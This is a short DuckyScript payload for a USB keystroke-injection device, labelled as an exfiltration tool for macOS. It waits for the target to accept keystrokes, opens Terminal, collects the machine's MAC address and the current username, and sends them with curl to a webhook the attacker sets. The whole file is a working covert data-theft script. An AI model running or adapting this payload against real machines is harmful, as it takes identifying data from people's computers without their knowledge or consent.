1
REM_BLOCK
2
####################################################
3
#                                                  #
4
# Title        : Exfiltrate Mac Address - MacOS    #
5
# Author       : bst04 - Aleff                     #
6
# Version      : 1.0                               #
7
# Category     : Exfiltration                      #
8
# Target       : MacOS                             #
9
#                                                  #
10
####################################################
11
END_REM
12

13
REM Set the #WEBHOOK to complete the exfiltration
14
DEFINE #WEBHOOK example
15

16
EXTENSION DETECT_READY
17
    REM VERSION 1.1
18
    REM AUTHOR: Korben
19

20
    REM_BLOCK DOCUMENTATION
21
        USAGE:
22
            Extension runs inline (here)
23
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
24
            boot delay
25

26
        TARGETS:
27
            Any system that reflects CAPSLOCK will detect minimum required delay
28
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
29
    END_REM
30

31
    REM CONFIGURATION:
32
    DEFINE #RESPONSE_DELAY 25
33
    DEFINE #ITERATION_LIMIT 120
34

35
    VAR $C = 0
36
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
37
        CAPSLOCK
38
        DELAY #RESPONSE_DELAY
39
        $C = ($C + 1)
40
    END_WHILE
41
    CAPSLOCK
42
END_EXTENSION
43

44
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
45
DELAY 200
46

47
GUI SPACE
48
DELAY 250
49
STRINGLN TERMINAL
50
DELAY 750
51
STRINGLN mac=$(networksetup -getmacaddress en0) 
52
DELAY 750
53
STRINGLN name=$(id -un)
54
DELAY 850
55
STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK
56

57